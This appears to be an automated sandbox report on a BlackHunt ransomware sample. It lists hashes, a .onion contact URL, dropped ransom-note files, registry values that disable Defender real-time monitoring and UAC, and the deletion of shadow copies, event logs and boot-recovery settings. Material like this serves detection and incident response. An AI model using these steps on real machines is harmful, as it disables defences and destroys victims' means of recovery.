Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:20
Static task
static1
Behavioral task
behavioral1
Sample
50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe
Resource
win10v2004-20231222-en
General
-
Target
50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe
-
Size
707KB
-
MD5
0cd858eab0168afc7aa914f44be913d8
-
SHA1
78feb757b2ed91c09c49e9267b03f12d4523fc03
-
SHA256
50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47
-
SHA512
cd4a9412e707b846eb49f65a6d33e984332182d91e04625fb7ffed7e06ca655e1b360b27562b8c099337d13f89fda4a60c75997ebf3882461788ff64e87d3ea4
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1t83vnh:6uaTmkZJ+naie5OTamgEoKxLWofh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2612 fsutil.exe 5068 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 4788 wevtutil.exe 4800 wevtutil.exe 4968 wevtutil.exe 4824 wevtutil.exe 5032 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1500 bcdedit.exe 1280 bcdedit.exe 4780 bcdedit.exe 4564 bcdedit.exe -
Renames multiple (2906) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2884 wbadmin.exe 4796 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 4728 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\V: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\R: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\K: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\T: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\Y: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\H: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\Z: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\E: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\L: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\N: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\M: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\O: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\P: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\X: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\B: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\W: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\S: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\J: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\I: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\A: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\G: 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened (read-only) \??\F: cmd.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#BlackHunt_ReadMe.hta 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\lua\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#BlackHunt_ReadMe.hta 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jre7\lib\logging.properties 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#BlackHunt_ReadMe.txt 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\locale\is\#BlackHunt_ReadMe.txt 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#BlackHunt_ReadMe.hta 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files (x86)\#BlackHunt_ReadMe.hta 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\#BlackHunt_ReadMe.hta 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#BlackHunt_ReadMe.txt 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.hta 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.hta 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#BlackHunt_ReadMe.txt 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files (x86)\Google\Update\Offline\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#BlackHunt_ReadMe.hta 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\#BlackHunt_ReadMe.txt 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\#BlackHunt_ReadMe.hta 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_Private.key 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 304 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2528 vssadmin.exe 2220 vssadmin.exe 1332 vssadmin.exe 2016 vssadmin.exe 2552 vssadmin.exe 5024 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4820 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4816 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 5620 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe Token: SeRestorePrivilege 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe Token: SeBackupPrivilege 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe Token: SeTakeOwnershipPrivilege 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe Token: SeAuditPrivilege 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe Token: SeSecurityPrivilege 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe Token: SeIncBasePriorityPrivilege 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe Token: SeBackupPrivilege 1924 vssvc.exe Token: SeRestorePrivilege 1924 vssvc.exe Token: SeAuditPrivilege 1924 vssvc.exe Token: SeBackupPrivilege 2972 wbengine.exe Token: SeRestorePrivilege 2972 wbengine.exe Token: SeSecurityPrivilege 2972 wbengine.exe Token: SeSecurityPrivilege 4788 wevtutil.exe Token: SeBackupPrivilege 4788 wevtutil.exe Token: SeSecurityPrivilege 4800 wevtutil.exe Token: SeBackupPrivilege 4800 wevtutil.exe Token: SeSecurityPrivilege 4824 wevtutil.exe Token: SeBackupPrivilege 4824 wevtutil.exe Token: SeSecurityPrivilege 4968 wevtutil.exe Token: SeBackupPrivilege 4968 wevtutil.exe Token: SeSecurityPrivilege 5032 wevtutil.exe Token: SeBackupPrivilege 5032 wevtutil.exe Token: SeDebugPrivilege 4820 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2304 wrote to memory of 2888 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 30 PID 2304 wrote to memory of 2888 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 30 PID 2304 wrote to memory of 2888 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 30 PID 2304 wrote to memory of 2888 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 30 PID 2304 wrote to memory of 1332 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 93 PID 2304 wrote to memory of 1332 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 93 PID 2304 wrote to memory of 1332 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 93 PID 2304 wrote to memory of 1332 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 93 PID 2888 wrote to memory of 2660 2888 cmd.exe 151 PID 2888 wrote to memory of 2660 2888 cmd.exe 151 PID 2888 wrote to memory of 2660 2888 cmd.exe 151 PID 2304 wrote to memory of 2272 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 150 PID 2304 wrote to memory of 2272 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 150 PID 2304 wrote to memory of 2272 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 150 PID 2304 wrote to memory of 2272 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 150 PID 2304 wrote to memory of 2740 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 148 PID 2304 wrote to memory of 2740 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 148 PID 2304 wrote to memory of 2740 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 148 PID 2304 wrote to memory of 2740 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 148 PID 1332 wrote to memory of 2760 1332 vssadmin.exe 43 PID 1332 wrote to memory of 2760 1332 vssadmin.exe 43 PID 1332 wrote to memory of 2760 1332 vssadmin.exe 43 PID 2304 wrote to memory of 2812 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 34 PID 2304 wrote to memory of 2812 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 34 PID 2304 wrote to memory of 2812 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 34 PID 2304 wrote to memory of 2812 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 34 PID 2304 wrote to memory of 2696 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 42 PID 2304 wrote to memory of 2696 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 42 PID 2304 wrote to memory of 2696 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 42 PID 2304 wrote to memory of 2696 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 42 PID 2304 wrote to memory of 2560 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 35 PID 2304 wrote to memory of 2560 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 35 PID 2304 wrote to memory of 2560 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 35 PID 2304 wrote to memory of 2560 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 35 PID 2272 wrote to memory of 2232 2272 cmd.exe 41 PID 2272 wrote to memory of 2232 2272 cmd.exe 41 PID 2272 wrote to memory of 2232 2272 cmd.exe 41 PID 2304 wrote to memory of 2772 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 39 PID 2304 wrote to memory of 2772 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 39 PID 2304 wrote to memory of 2772 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 39 PID 2304 wrote to memory of 2772 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 39 PID 2304 wrote to memory of 2668 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 38 PID 2304 wrote to memory of 2668 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 38 PID 2304 wrote to memory of 2668 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 38 PID 2304 wrote to memory of 2668 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 38 PID 2740 wrote to memory of 2060 2740 cmd.exe 147 PID 2740 wrote to memory of 2060 2740 cmd.exe 147 PID 2740 wrote to memory of 2060 2740 cmd.exe 147 PID 2304 wrote to memory of 2852 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 146 PID 2304 wrote to memory of 2852 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 146 PID 2304 wrote to memory of 2852 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 146 PID 2304 wrote to memory of 2852 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 146 PID 2304 wrote to memory of 2816 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 44 PID 2304 wrote to memory of 2816 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 44 PID 2304 wrote to memory of 2816 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 44 PID 2304 wrote to memory of 2816 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 44 PID 2304 wrote to memory of 2720 2304 